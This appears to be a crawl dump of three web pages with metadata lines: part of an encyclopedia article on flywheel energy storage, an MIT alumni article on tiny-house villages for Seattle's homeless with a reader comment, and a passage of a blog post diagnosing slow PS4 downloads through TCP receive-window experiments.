layers spinning in opposite directions. However this increases housing and bearing complexity. ## Applications [edit]### Transportation [edit]#### Automotive [edit]In the 1950s, flywheel-powered buses, known as gyrobuses, were used in Yverdon (Switzerland) and Ghent (Belgium) and there is ongoing research to make flywheel systems that are smaller, lighter, cheaper and have a greater capacity. It is hoped that flywheel systems can replace conventional chemical batteries for mobile applications, such as for electric vehicles. Proposed flywheel systems would eliminate many of the disadvantages of existing battery power systems, such as low capacity, long charge times, heavy weight and short usable lifetimes. Flywheels may have been used in the experimental Chrysler Patriot, though that has been disputed.[20] Flywheels have also been proposed for use in continuously variable transmissions. Punch Powertrain is currently working on such a device.[21] During the 1990s, Rosen Motors developed a gas turbine powered series hybrid automotive powertrain using a 55,000 rpm flywheel to provide bursts of acceleration which the small gas turbine engine could not provide. The flywheel also stored energy through regenerative braking. The flywheel was composed of a titanium hub with a carbon fiber cylinder and was gimbal-mounted to minimize adverse gyroscopic effects on vehicle handling. The prototype vehicle was successfully road tested in 1997 but was never mass-produced.[22] In 2013, Volvo announced a flywheel system fitted to the rear axle of its S60 sedan. Braking action spins the flywheel at up to 60,000 rpm and stops the front-mounted engine. Flywheel energy is applied via a special transmission to partially or completely power the vehicle. The 20-centimetre (7.9 in), 6-kilogram (13 lb) carbon fiber flywheel spins in a vacuum to eliminate friction. When partnered with a four-cylinder engine, it offers up to a 25 percent reduction in fuel consumption versus a comparably performing turbo six-cylinder, providing an 80 horsepower (60 kW) boost and allowing it to reach 100 kilometres per hour (62 mph) in 5.5 seconds. The company did not announce specific plans to include the technology in its product line.[23] In July 2014 GKN acquired Williams Hybrid Power (WHP) division and intends to supply 500 carbon fiber *Gyrodrive* electric flywheel systems to urban bus operators over the next two years[24] As the former developer name implies, these were originally designed for Formula one motor racing applications. In September 2014, Oxford Bus Company announced that it is introducing 14 *Gyrodrive hybrid* buses by Alexander Dennis on its Brookes Bus operation.[25][26] #### Rail vehicles [edit]Flywheel systems have been used experimentally in small electric locomotives for shunting or switching, e.g. the Sentinel-Oerlikon Gyro Locomotive. Larger electric locomotives, e.g. British Rail Class 70, have sometimes been fitted with flywheel boosters to carry them over gaps in the third rail. Advanced flywheels, such as the 133 kWh pack of the University of Texas at Austin, can take a train from a standing start up to cruising speed.[2] The Parry People Mover is a railcar which is powered by a flywheel. It was trialled on Sundays for 12 months on the Stourbridge Town Branch Line in the West Midlands, England during 2006 and 2007 and was intended to be introduced as a full service by the train operator London Midland in December 2008 once two units had been ordered. In January 2010, both units are in operation.[27] #### Rail electrification [edit]FES can be used at the lineside of electrified railways to help regulate the line voltage thus improving the acceleration of unmodified electric trains and the amount of energy recovered back to the line during regenerative braking, thus lowering energy bills.[28] Trials have taken place in London, New York, Lyon and Tokyo,[29] and New York MTA's Long Island Rail Road is now investing $5.2m in a pilot project on LIRR's West Hempstead Branch line.[30] These trials and systems store kinetic energy in rotors consisting of a carbon-glass composite cylinder packed with neodymium-iron-boron powder that forms a permanent magnet. These spin at up to 37,800 rpm, and each 100 kW (130 hp) unit can store 11 megajoules (3.1 kWh) of re-usable energy, approximately enough to accelerate a weight of 200 metric tons (220 short tons; 197 long tons) from zero to 38 km/h (24 mph).[29] ### Uninterruptible power supplies [edit]Flywheel power storage systems in production as of 2001[update] had storage capacities comparable to batteries and faster discharge rates. They are mainly used to provide load leveling for large battery systems, such as an uninterruptible power supply for data centers as they save a considerable amount of space compared to battery systems.[31] Flywheel maintenance in general runs about one-half the cost of traditional battery UPS systems. The only maintenance is a basic annual preventive maintenance routine and replacing the bearings every five to ten years, which takes about four hours.[7] Newer flywheel systems completely levitate the spinning mass using maintenance-free magnetic bearings, thus eliminating mechanical bearing maintenance and failures.[7] Costs of a fully installed flywheel UPS (including power conditioning) were (in 2009) about $330 per kilowatt (for 15 seconds full-load capacity).[32] ### Test laboratories [edit]A long-standing niche market for flywheel power systems are facilities where circuit breakers and similar devices are tested: even a small household circuit breaker may be rated to interrupt a current of 10,000 or more amperes, and larger units may have interrupting ratings of 100,000 or 1,000,000 amperes. The enormous transient loads produced by deliberately forcing such devices to demonstrate their ability to interrupt simulated short circuits would have unacceptable effects on the local grid if these tests were done directly from building power. Typically such a laboratory will have several large motor–generator sets, which can be spun up to speed over several minutes; then the motor is disconnected before a circuit breaker is tested. ### Physics laboratories [edit]Tokamak fusion experiments need very high currents for brief intervals (mainly to power large electromagnets for a few seconds). - JET (the Joint European Torus) has two 775 t (854 short tons; 763 long tons) flywheels (installed in 1981) that spin up to 225 rpm. [33]Each flywheel stores 3.75 GJ and can deliver at up to 400 MW (540,000 hp).[34] - The Helically Symmetric Experiment at the University of Wisconsin-Madison has 18 one-ton flywheels, which are spun to 10,000 rpm using repurposed electric train motors. - ASDEX Upgrade has 3 flywheel generators. - DIII-D (tokamak) at General Atomics - the Princeton Large Torus (PLT) at the Princeton Plasma Physics Laboratory Also the non-tokamak: Nimrod synchrotron at the Rutherford Appleton Laboratory had two 30 ton flywheels. ### Aircraft launching systems [edit]The *Gerald R. Ford*-class aircraft carrier will use flywheels to accumulate energy from the ship's power supply, for rapid release into the electromagnetic aircraft launch system. The shipboard power system cannot on its own supply the high power transients necessary to launch aircraft. Each of four rotors will store 121 MJ (34 kWh) at 6400 rpm. They can store 122 MJ (34 kWh) in 45 secs and release it in 2–3 seconds.[35] The flywheel energy densities are 28 kJ/kg (8 W·h/kg); including the stators and cases this comes down to 18.1 kJ/kg (5 W·h/kg), excluding the torque frame.[35] ### NASA G2 flywheel for spacecraft energy storage [edit]This was a design funded by NASA's Glenn Research Center and intended for component testing in a laboratory environment. It used a carbon fiber rim with a titanium hub designed to spin at 60,000 rpm, mounted on magnetic bearings. Weight was limited to 250 pounds (110 kilograms). Storage was 525 Wh (1.89 MJ) and could be charged or discharged at 1 kW (1.3 hp), leading to a specific energy of 5.31 W⋅h/kg and power density of 10.11 W/kg.[36] The working model shown in the photograph at the top of the page ran at 41,000 rpm on September 2, 2004.[37] ### Amusement rides [edit]The Montezooma's Revenge roller coaster at Knott's Berry Farm was the first flywheel-launched roller coaster in the world and is the last ride of its kind still operating in the United States. The ride uses a 7.6 tonnes flywheel to accelerate the train to 55 miles per hour (89 km/h) in 4.5 seconds. The Incredible Hulk roller coaster at Universal's Islands of Adventure features a rapidly accelerating uphill launch as opposed to the typical gravity drop. This is achieved through powerful traction motors that throw the car up the track. To achieve the brief very high current required to accelerate a full coaster train to full speed uphill, the park utilizes several motor-generator sets with large flywheels. Without these stored energy units, the park would have to invest in a new substation or risk browning-out the local energy grid every time the ride launches. ### Pulse power [edit]Flywheel Energy Storage Systems (FESS) are found in a variety of applications ranging from grid-connected energy management to uninterruptible power supplies. With the progress of technology, there is fast renovation involved in FESS application. Examples include high power weapons, aircraft powertrains and shipboard power systems, where the system requires a very high-power for a short period in order of a few seconds and even milliseconds. Compensated pulsed alternator (compulsator) is one of the most popular choices of pulsed power supplies for fusion reactors, high-power pulsed lasers, and hypervelocity electromagnetic launchers because of its high energy density and power density, which is generally designed for the FESS.[38] Compulsators (low-inductance alternators) act like capacitors, they can be spun up to provide pulsed power for railguns and lasers. Instead of having a separate flywheel and generator, only the large rotor of the alternator stores energy. See also Homopolar generator.[39] ### Motor sports [edit]Using a continuously variable transmission (CVT), energy is recovered from the drive train during braking and stored in a flywheel. This stored energy is then used during acceleration by altering the ratio of the CVT.[40] In motor sports applications this energy is used to improve acceleration rather than reduce carbon dioxide emissions – although the same technology can be applied to road cars to improve fuel efficiency.[41] Automobile Club de l'Ouest, the organizer behind the annual 24 Hours of Le Mans event and the Le Mans Series, is currently "studying specific rules for LMP1 which will be equipped with a kinetic energy recovery system."[42] Williams Hybrid Power, a subsidiary of Williams F1 Racing team,[43] have supplied Porsche and Audi with flywheel based hybrid system for Porsche's 911 GT3 R Hybrid[44] and Audi's R18 e-Tron Quattro.[45] Audi's victory in 2012 24 Hours of Le Mans is the first for a hybrid (diesel-electric) vehicle.[46] ### Grid energy storage [edit] Flywheels are sometimes used as short term spinning reserve for momentary grid frequency regulation and balancing sudden changes between supply and consumption. No carbon emissions, faster response times and ability to buy power at off-peak hours are among the advantages of using flywheels instead of traditional sources of energy like natural gas turbines.[47] Operation is very similar to batteries in the same application, their differences are primarily economic. Beacon Power opened a 5 MWh (20 MW over 15 mins)[18] flywheel energy storage plant in Stephentown, New York in 2011[48] using 200 flywheels[49] and a similar 20 MW system at Hazle Township, Pennsylvania in 2014.[50] A 0.5MWh (2 MW for 15 min)[51] flywheel storage facility in Minto, Ontario, Canada opened in 2014.[52] The flywheel system (developed by NRStor) uses 10 spinning steel flywheels on magnetic bearings.[52] Amber Kinetics, Inc. has an agreement with Pacific Gas and Electric (PG&E) for a 20 MW / 80 MWh flywheel energy storage facility located in Fresno, CA with a four-hour discharge duration.[53] A 30 MW flywheel grid system started operating in China in 2024.[54] ### Wind turbines [edit]Flywheels may be used to store energy generated by wind turbines during off-peak periods or during high wind speeds. In 2010, Beacon Power began testing of their Smart Energy 25 (Gen 4) flywheel energy storage system at a wind farm in Tehachapi, California. The system was part of a wind power/flywheel demonstration project being carried out for the California Energy Commission.[55] ### Toys [edit]Friction motors used to power many toy cars, trucks, trains, action toys and such, are simple flywheel motors. ### Toggle action presses [edit]In industry, toggle action presses are still popular. The usual arrangement involves a very strong crankshaft and a heavy duty connecting rod which drives the press. Large and heavy flywheels are driven by electric motors but the flywheels turn the crankshaft only when clutches are activated. ### Beyond energy storage [edit]Flywheels can be used for attitude control. There is also some research into motion control,[56] mostly to stabilize systems using the gyroscopic effect. ## Comparison to electric batteries [edit]Flywheels are not as adversely affected by temperature changes, can operate at a much wider temperature range, and are not subject to many of the common failures of chemical rechargeable batteries.[57] They are also less potentially damaging to the environment, being largely made of inert or benign materials. Another advantage of flywheels is that by a simple measurement of the rotation speed it is possible to know the exact amount of energy stored. Unlike most batteries which operate only for a finite period[ citation needed] (for example roughly 10 [58]years in the case of lithium iron phosphate batteries), a flywheel potentially has an indefinite working lifespan. Flywheels built as part of James Watt steam engines have been continuously working for more than two hundred years. [59]Working examples of ancient flywheels used mainly in milling and pottery can be found in many locations in Africa, Asia, and Europe. [60] [61] Most modern flywheels are typically sealed devices that need minimal maintenance throughout their service lives. Magnetic bearing flywheels in vacuum enclosures, such as the NASA model depicted above, do not need any bearing maintenance and are therefore superior to batteries both in terms of total lifetime and energy storage capacity, since their effective service lifespan is still unknown. Flywheel systems with mechanical bearings will have limited lifespans due to wear. High performance flywheels can explode, killing bystanders with high-speed fragments.[ citation needed] Flywheels can be installed below-ground to reduce this risk. While batteries can catch fire and release toxins, there is generally time for bystanders to flee and escape injury. The physical arrangement of batteries can be designed to match a wide variety of configurations, whereas a flywheel at a minimum must occupy a certain area and volume, because the energy it stores is proportional to its rotational inertia and to the square of its rotational speed. As a flywheel gets smaller, its mass also decreases, so the speed must increase, and so the stress on the materials increases. Where dimensions are a constraint, (e.g. under the chassis of a train), a flywheel may not be a viable solution.[ citation needed] ## See also [edit]- Beacon Power - Compensated pulsed alternator – Form of power supply - Electric double-layer capacitor – High-capacity electrochemical capacitor - Energy storage – Captured energy for later usage - Grid energy storage – Large scale electricity supply management - Inverter – Device that changes direct current (DC) to alternating current (AC) - Launch loop – Proposed system for launching objects into orbit - List of energy storage projects - List of energy topics – Overview of and topical guide to energy - Plug-in hybrid – Hybrid vehicle whose battery may be externally charged - Rechargeable battery – Type of electrical battery - Regenerative brake – Energy recovery mechanism - Rotational energy – Kinetic energy of rotating body with moment of inertia and angular velocity - STATCOM – Regulating device used on transmission networks - United States Department of Energy International Energy Storage Database ## References [edit]**^**Torotrak Toroidal variable drive CVT Archived May 16, 2011, at the Wayback Machine, retrieved June 7, 2007.- ^ **a****b****c****d**Castelvecchi, Davide (May 19, 2007). "Spinning into control: High-tech reincarnations of an ancient way of storing energy".**e***Science News*.**17**(20): 312–313. doi:10.1002/scin.2007.5591712010. Archived from the original on June 6, 2014. Retrieved August 2, 2012. **^**Flybrid Automotive Limited. "Original F1 System - Flybrid Automotive". Archived from the original on 2016-03-03. Retrieved 2010-01-28.**^**"Superconducting bearings for flywheel applications". Archived from the original on 2019-05-13. Retrieved 2017-02-04.- ^ **a**"Home".**b***ITPEnergised*. **^**"Next-gen Of Flywheel Energy Storage". Product Design & Development. Archived from the original on 2010-07-10. Retrieved 2009-05-21.- ^ **a****b**Vere, Henry. "A Primer of Flywheel Technology". Distributed Energy. Archived from the original on 2018-05-22. Retrieved 2008-10-06.**c** **^**rosseta Technik GmbH, Flywheel Energy Storage Model T4, retrieved February 4, 2010.**^**Genta, Giancarlo (1985).*Kinetic Energy Storage*. London: Butterworth & Co. Ltd.**^**"Flywheel Kinetic Energy".*The Engineering Toolbox*.**^**Genta, Giancarlo (1989). "Some considerations on the constant stress disc profile".*Meccanica*.**24**(4): 235–248. doi:10.1007/BF01556455. S2CID 122502834.**^**Li, Xiaojun; Anvari, Bahareh; Palazzolo, Alan; Wang, Zhiyang; Toliyat, Hamid (August 2018). "A Utility-Scale Flywheel Energy Storage System with a Shaftless, Hubless, High-Strength Steel Rotor".*IEEE Transactions on Industrial Electronics*.**65**(8): 6667–6675. doi:10.1109/TIE.2017.2772205. ISSN 0278-0046. S2CID 4557504.**^**"Carbon Fiber Flywheels". Retrieved 2016-10-07.**^**"PowerThru flywheel". Archived from the original on 2012-05-03. Retrieved 2012-04-29.**^**"Kinetic Energy Storage Systems". Retrieved 2016-10-27.**^**Janse van Rensburg, P. J. (December 2011).*Energy storage in composite flywheel rotors*(Thesis). University of Stellenbosch. hdl:10019.1/17864.**^**rosseta Technik GmbH, Flywheel Energy Storage, German, retrieved February 4, 2010.- ^ **a**Beacon Power Corp, Frequency Regulation and Flywheels fact sheet, retrieved July 11, 2011. Archived March 31, 2010, at the Wayback Machine**b** **^***Study on Rollover prevention of heavy-duty vehicles by using flywheel energy storage systems*, Suda Yoshihiro, Huh Junhoi, Aki Masahiko, Shihpin Lin, Ryoichi Takahata, Naomasa Mukaide, Proceedings of the FISITA 2012 World Automotive Congress, Lecture Notes in Electrical Engineering Volume 197, 2013, pp 693-701, doi:10.1007/978-3-642-33805-2 57**^**"Chrysler Patriot hybrid-electric racing car: 20 years early for F1 racing?". 16 November 2020.**^**"Agoria>GoodNews!>Archieven 2012>Punch Powertrain werkt aan revolutionaire vliegwiel-hybride transmissie". Archived from the original on 2013-05-22. Retrieved 2012-09-13.**^**Wakefield, Ernest (1998).*History of the Electric Automobile: Hybrid Electric Vehicles*. SAE. p. 332. ISBN 978-0-7680-0125-9.**^**"Volvo confirms fuel savings of 25 percent with flywheel KERS". Gizmag.com. 26 April 2013. Retrieved 2013-04-26.**^**"GKN and the Go-Ahead Group using F1 technology to improve fuel efficiency of London buses". 29 July 2014.**^**"It's the New BROOKESbus!".*Oxford Bus Company*. 5 September 2014.**^**"BBC News - Formula One race technology to power buses in Oxford".*BBC News*. 2 September 2014.**^**"Parry People Movers for Stourbridge branch line". London Midland. 2008-01-03. Archived from the original on 2008-05-17. Retrieved 2008-03-19.**^**"High-speed flywheels cut energy bill".*Railway Gazette International*. 2001-04-01. Archived from the original on 2011-06-15. Retrieved 2010-12-02.- ^ **a**"Kinetic energy storage wins acceptance".**b***Railway Gazette International*. 2004-04-01. Archived from the original on 2011-05-28. Retrieved 2010-12-02. **^**"New York orders flywheel energy storage".*Railway Gazette International*. 2009-08-14. Archived from the original on 2011-05-28. Retrieved 2011-02-09.**^**"Flywheels gain as alternative to batteries".*www.datacenterknowledge.com*. 26 June 2007. Retrieved 17 September 2024.**^**"Active Power Article - Flywheel energy storage - Claverton Group".*www.claverton-energy.com*. 21 June 2009. Retrieved 17 September 2024.**^**"Week 20: JET Experiments: sensitive to TV schedules". Archived from the original on 2020-07-31. Retrieved 2018-05-03.**^**"Power supply". Archived from the original on 2016-01-05. Retrieved 2015-12-07.- ^ **a**Michael R. Doyle; Douglas J. Samuel; Thomas Conway & Robert R. Klimowski (1994-04-15). Electromagnetic Aircraft Launch System - EMALS (PDF) (Report). Archived from the original (PDF) on 2003-07-08.**b** **^**G2 Flywheel Module Design**^**Jansen, Ralph H.; McLallin, Kerry L. (June 2005). "NASA Technical Reports Server (NTRS)".*Research and Technology 2004*.**^**Wang, H.; Liu, K.; Zhu, B.; Feng, J.; Ao, P.; Zhang, Z. (1 August 2015). "Analytical Investigation and Scaled Prototype Tests of a Novel Permanent Magnet Compulsator".*IEEE Transactions on Magnetics*.**51**(8): 2415466. Bibcode:2015ITM....5115466W. doi:10.1109/TMAG.2015.2415466. S2CID 24547533.**^**"COMPULSATORS".*orbitalvector.com*. Retrieved 31 March 2018.**^**Flybrid Automotive Limited. "Technology - Flybrid Automotive". Archived from the original on 2010-07-13. Retrieved 2007-11-09.**^**Flybrid Automotive Limited. "Road Car Systems - Flybrid Automotive".**^**"ACO Technical Regulations 2008 for Prototype "LM"P1 and "LM"P2 classes" (PDF). Automobile Club de l'Ouest (ACO). 2007-12-20. p. 3. Archived from the original (PDF) on May 17, 2008. Retrieved 2008-04-10.**^**"Williams Hybrid Power Motorsports Applications". Archived from the original on 2014-02-09. Retrieved 2014-03-05.**^**"911 GT3 R Hybrid Celebrates World Debut in Geneva".*www.porsche.com*. 2010-02-11. Retrieved 17 September 2024.**^**"Audi R18 e-Tron quattro".*www.ultimatecarpage.com*. Retrieved 17 September 2024.**^**Beer, Matt. "Audi #1 crew claims first hybrid Le Mans 24 Hours win".*Autosport*.**^**Flywheel-based Solutions for Grid Reliability Archived July 12, 2007, at the Wayback Machine**^**http://www.sandia.gov/ess/docs/pr_conferences/2014/Thursday/Session7/02_Areseneaux_Jim_20MW_Flywheel_Energy_Storage_Plant_140918.pdf[*bare URL PDF*]**^**"Stephentown, New York - Beacon Power".*beaconpower.com*. Retrieved 31 March 2018.**^**"Hazle Township, Pennsylvania - Beacon Power".*beaconpower.com*. Retrieved 31 March 2018.**^**"IESO Expedited System Impact Assessment - MINTO FLYWHEEL FACILITY" (PDF).*ieso.ca*. Archived from the original (PDF) on 29 January 2016. Retrieved 31 March 2018.- ^ **a**"Canada's first grid storage system launches in Ontario - PV-Tech Storage".**b***PV-Tech Storage*. Archived from the original on 2014-08-31. Retrieved 2014-07-30. **^**"PG&E Presents Innovative Energy Storage Agreements | PG&E".*www.pge.com*. Retrieved 2017-03-10.**^**"China connects its first large-scale flywheel storage project to grid".*Energy Storage*. 13 September 2024.**^**"Beacon Connects Flywheel System to California Wind Farm". 26 May 2023.**^**Lee, Sangdeok; Jung, Seul (September 2018). "Detection and control of a gyroscopically induced vibration to improve the balance of a single-wheel robot".*Journal of Low Frequency Noise, Vibration and Active Control*.**37**(3): 443–455. Bibcode:2018JLFNV..37..443L. doi:10.1177/0263092317716075. ISSN 1461-3484. S2CID 115243859.**^**"Lithium Battery Failures". Mpoweruk.com. Retrieved 2013-04-26.**^**"How to Optimize Your LiFePO4 Battery's Lifespan".*Goal Zero*. 16 January 2024.**^**Powerhouse Museum. "Boulton and Watt steam engine". Powerhouse Museum, Australia. Retrieved 2 August 2012.**^**Donners, K.; Waelkens, M.; Deckers, J. (2002). "Water Mills in the Area of Sagalassos: A Disappearing Ancient Technology".*Anatolian Studies*.**52**: 1–17. doi:10.2307/3643076. JSTOR 3643076. S2CID 163811541.**^**Wilson, A. (2002). "Machines, Power and the Ancient Economy".*The Journal of Roman Studies*.**92**: 1–32. doi:10.2307/3184857. JSTOR 3184857. S2CID 154629776. ## Further reading [edit]- Beacon Power Applies for DOE Grants to Fund up to 50% of Two 20 MW Energy Storage Plants, Sep. 1, 2009 [1] [*permanent dead link*] - Sheahen, Thomas P. (1994). *Introduction to High-Temperature Superconductivity*. New York: Plenum Press. pp. 76–78, 425–431. ISBN 978-0-306-44793-8. - El-Wakil, M. M. (1984). *Powerplant Technology*. McGraw-Hill. pp. 685–689. ISBN 9780070192881. - Koshizuka, N.; Ishikawa, F.; Nasu, H.; Murakami, M.; et al. (2003). "Progress of superconducting bearing technologies for flywheel energy storage systems". *Physica C*.**386**(386): 444–450. Bibcode:2003PhyC..386..444K. doi:10.1016/S0921-4534(02)02206-2. - Wolsky, A. M. (2002). "The status and prospects for flywheels and SMES that incorporate HTS". *Physica C*.**372**(372–376): 1495–1499. Bibcode:2002PhyC..372.1495W. doi:10.1016/S0921-4534(02)01057-2. - Sung, T. H.; Han, S. C.; Han, Y. H.; Lee, J. S.; et al. (2002). "Designs and analyses of flywheel energy storage systems using high-Tc superconductor bearings". *Cryogenics*.**42**(6–7): 357–362. Bibcode:2002Cryo...42..357S. doi:10.1016/S0011-2275(02)00057-7. - Akhil, Abbas; Swaminathan, Shiva; Sen, Rajat K. (February 2007). "Cost Analysis of Energy Storage Systems for Electric Utility Applications" (PDF). Sandia National laboratories. Archived from the original (PDF) on 2007-06-21. - Larbalestier, David; Blaugher, Richard D.; Schwall, Robert E.; Sokolowski, Robert S.; et al. (September 1997). "Flywheels". *Power Applications of Superconductivity in Japan and Germany*. World Technology Evaluation Center. - "A New Look at an Old Idea: The Electromechanical Battery" (PDF). *Science & Technology Review*: 12–19. April 1996. Archived from the original (PDF) on 2008-04-05. Retrieved 2006-07-21. - Janse van Rensburg, P.J. (December 2011). *Energy storage in composite flywheel rotors*(Thesis). University of Stellenbosch, South Africa. hdl:10019.1/17864. - Devitt, Drew (March 2010). "Making a case for flywheel energy storage". Renewable Energy World Magazine North America. - Li, X., & Palazzolo, A. (2022). A review of flywheel energy storage systems: State of the art and opportunities. *Journal of Energy Storage*,*46*, 103576. https://doi.org/10.1016/j.est.2021.103576
true
true
true
null
2024-10-12 00:00:00
2001-10-01 00:00:00
https://upload.wikimedia…px-G2_front2.jpg
website
wikipedia.org
Wikimedia Foundation, Inc.
null
null
17,380,712
https://alum.mit.edu/slice/tiny-houses-solve-huge-problem
Tiny Houses Solve Huge Problem
Julie Fox
# Tiny Houses Solve Huge Problem - - slice.mit.edu - 1 ## Filed Under “I believe very strongly that housing is a human right,” says Sharon Lee MArch '81, MCP '81 who is addressing the housing crisis in Seattle, Washington, the city with the third largest homeless population in the country following New York City and Los Angeles. As founder and executive director of the Low Income Housing Institute (LIHI), Lee has adjusted her strategy in the last few years as homelessness has become rampant. The solution: tiny houses. Tiny houses are a growing trend in the real estate market for those with a minimalist goal, but they’re not just cute, they’re also practical. These tiny houses are eight feet by 12 feet and they include lights, heat, a window, and a door with a lock. LIHI’s tiny houses are built, often by local volunteers and students, in areas with open land or unused parking lots and are set up to be their own small community. Each tiny house village—there are seven throughout the city—has some sort of communal kitchen and bathroom facility. Most importantly, since the tiny houses are under 120-square-feet, they aren’t considered a dwelling unit so they can be built and operational quickly. “If you want to build a building, it takes a year to get financing, a year to get permits, and a year to year-and-a-half to build. In the meantime, people are literally dying on the streets,” says Lee. According to Lee, there are approximately 11,000 homeless people in Seattle on any given night, which, due to space constraints of shelters, leaves nearly 5,000 completely unsheltered. Over the past two years, nearly 2,000 people have taken advantage of the tiny house communities, built by LIHI with the help of the City of Seattle—they fund the utilities to power the houses and provide social workers and case managers. The houses—meant to be a temporary solution—have proved to be more than a temporary shelter, but also a vehicle for turning their lives around. “It is very emotional,” says Lee. “When we offer people a tiny house, they may have been on the street for four years and they finally move into a place that's heated and where they can stay and they're just overwhelmed. Then they find that they can get their life together once they're in a tiny house. They can address their health care, their mental health, and their employment situation because they can be stable.” Over the past two years, more than 300 residents of the tiny house villages moved on to permanent housing and more than 250 gained employment. Throughout her career, Lee has developed more than 4,500 units of affordable housing—providing not just the bricks and mortar, but also a stable environment for families and underserved people. ## Comments Frank Fay Wed, 06/27/2018 5:08pm A Useful Tool but Not a SolutionI fully applaud Sharon Lee’s efforts to address homelessness and affordable housing. However, the headline is wrong! While tiny houses can be a useful tool, they are not a solution to homelessness. These tiny houses do not count as shelter under Federal guidelines (as they lack indoor plumbing), which impacts scoring for Federal funding. Further, tiny houses are an inefficient use of scarce land which is under excessive demand for housing. At $250/SF, a tiny house of 8-by-12 feet (96 SF) is $24,000 in property costs alone. Using a factor of 75% to adjust for stairs, yard, kitchen facilities, and sanitary facilities brings the property cost to $32,000. Assuming the 11,000 homeless were doubled up, $176M at least is required to house them in tiny houses. For comparison, the proposed 2018 budget for the City of Seattle would spend $60M on Homeless Strategy/Investments and $60M on the Low-Income Housing Fund. Seattle has had temporary tent city (now tiny house) encampments for a decade or more but that has not prevented a marked increase in homelessness in the past few years. Even if shelter could be provided, there is great lack of affordable housing for homeless, poor, low-income, and middle-income families. Like San Francisco, Los Angeles, and other cities, the influx of wealthy tech workers displaces current residents and forces low-wage service workers to the periphery. When the transportation for very long commutes fails, these families become homeless and move into the city core. It is this inequality of income and disparity of wealth that are the real problems which must be addressed. - Seattle, WA
true
true
true
Sharon Lee MArch '81, MCP '81 is addressing the overwhelming population of homeless individuals and families in Seattle, Washington, by thinking outside the box.
2024-10-12 00:00:00
2018-06-01 00:00:00
https://alum.mit.edu/sit…eenshot-opt1.jpg
Article
alum.mit.edu
MIT_alumni
null
null
15,054,252
https://www.snellman.net/blog/archive/2017-08-19-slow-ps4-downloads/
Why PS4 downloads are so slow
null
Game downloads on PS4 have a reputation of being very slow, with many people reporting downloads being an order of magnitude faster on Steam or Xbox. This had long been on my list of things to look into, but at a pretty low priority. After all, the PS4 operating system is based on a reasonably modern FreeBSD (9.0), so there should not be any crippling issues in the TCP stack. The implication is that the problem is something boring, like an inadequately dimensioned CDN. But then I heard that people were successfully using local HTTP proxies as a workaround. It should be pretty rare for that to actually help with download speeds, which made this sound like a much more interesting problem. This is going to be a long-winded technical post. If you're not interested in the details of the investigation but just want a recommendation on speeding up PS4 downloads, skip straight to the conclusions. ### Background Before running any experiments, it's good to have a mental model of how the thing we're testing works, and where the problems might be. If nothing else, it will guide the initial experiment design. The speed of a steady-state TCP connection is basically defined by three numbers. The amount of data the client is will to receive on a single round-trip (TCP receive window), the amount of data the server is willing to send on a single round-trip (TCP congestion window), and the round trip latency between the client and the server (RTT). To a first approximation, the connection speed will be: speed = min(rwin, cwin) / RTT With this model, how could a proxy speed up the connection? Well, with a proxy the original connection will be split into two mostly independent parts; one connection between the client and the proxy, and another between the proxy and the server. The speed of the end-to-end connection will be determined by the slower of those two independent connections: speed_proxy_client = min(client rwin, proxy cwin) / client-proxy RTT speed_server_proxy = min(proxy rwin, server cwin) / proxy-server RTT speed = min(speed_proxy_client, speed_server_proxy) With a local proxy the client-proxy RTT will be very low; that connection is almost guaranteed to be the faster one. The improvement will have to be from the server-proxy connection being somehow better than the direct client-server one. The RTT will not change, so there are just two options: either the client has a much smaller receive window than the proxy, or the client is somehow causing the server's congestion window to decrease. (E.g. the client is randomly dropping received packets, while the proxy isn't). Out of these two theories, the receive window one should be much more likely, so we should concentrate on it first. But that just replaces our original question with a new one: why would the client's receive window be so low that it becomes a noticeable bottleneck? There's a fairly limited number of causes for low receive windows that I've seen in the wild, and they don't really seem to fit here. - Maybe the client doesn't support the TCP window scaling option, while the proxy does. Without window scaling, the receive window will be limited to 64kB. But since we know Sony started with a TCP stack that supports window scaling, they would have had to go out of their way to disable it. Slow downloads, for no benefit. - Maybe the actual downloader application is very slow. The operating system is supposed to have a certain amount of buffer space available for each connection. If the network is delivering data to the OS faster than the application is reading it, the buffer will start to fill up, and the OS will reduce the receive window as a form of back-pressure. But this can't be the reason; if the application is the bottleneck, it'll be a bottleneck with or without the proxy. - The operating system is trying to dynamically scale the receive window to match the actual network conditions, but something is going wrong. This would be interesting, so it's what we're hoping to find. The initial theories are in place, let's get digging. ### Experiment #1 For our first experiment, we'll start a PSN download on a baseline non-Slim PS4, firmware 4.73. The network connection of the PS4 is bridged through a Linux machine, where we can add latency to the network using `tc netem` . By varying the added latency, we should be able to find out two things: whether the receive window really is the bottleneck, and whether the receive window is being automatically scaled by the operating system. This is what the client-server RTTs (measured from a packet capture using TCP timestamps) look like for the experimental period. Each dot represents 10 seconds of time for a single connection, with the Y axis showing the minimum RTT seen for that connection in those 10 seconds. The next graph shows the amount of data sent by the server in one round trip in red, and the receive windows advertised by the client in blue. First, since the blue dots are staying constantly at about 128kB, the operating system doesn't appear to be doing any kind of receive window scaling based on the RTT. (So much for that theory). Though at the very right end of the graph the receive window shoots out to 650kB, so it isn't totally fixed either. Second, is the receive window the bottleneck here? If so, the blue dots would be close to the red dots. This is the case until about 10:50. And then mysteriously the bottleneck moves to the server. So we didn't find quite what we were looking for, but there are a couple of very interesting things that are correlated with events on the PS4. The download was in the foreground for the whole duration of the test. But that doesn't mean it was the only thing running on the machine. The Netflix app was still running in the background, completely idle [1]. When the background app was closed at 11:00, the receive window increased dramatically. This suggests a second experiment, where different applications are opened / closed / left running in the background. The time where the receive window stops being the bottleneck is very close to the PS4 entering rest mode. That looks like another thing worth investigating. Unfortunately, that's not true, and rest mode is a red herring here. [2] ### Experiment #2 Below is a graph of the receive windows for a second download, annotated with the timing of various noteworthy events. The differences in receive windows at different times are striking. And more important, the changes in the receive windows correspond very well to specific things I did on the PS4. - When the download was started, the game Styx: Shards of Darkness was running in the background (just idling in the title screen). The download was limited by a receive window of under 7kB. This is an incredibly low value; it's basically going to cause the downloads to take **100 times longer than they should**. And this was not a coincidence, whenever that game was running, the receive window would be that low. - Having an app running (e.g. Netflix, Spotify) limited the receive window to 128kB, for about a 5x reduction in potential download speed. - Moving apps, games, or the download window to the foreground or background didn't have any effect on the receive window. - Launching some other games (Horizon: Zero Dawn, Uncharted 4, Dreadnought) seemed to have the same effect as running an app. - Playing an online match in a networked game (Dreadnought) caused the receive window to be artificially limited to 7kB. - Playing around in a non-networked game (Horizon: Zero Dawn) had a very inconsistent effect on the receive window, with the effect seemingly depending on the intensity of gameplay. This looks like a genuine resource restriction (download process getting variable amounts of CPU), rather than an artificial limit. - I ran a speedtest at a time when downloads were limited to 7kB receive window. 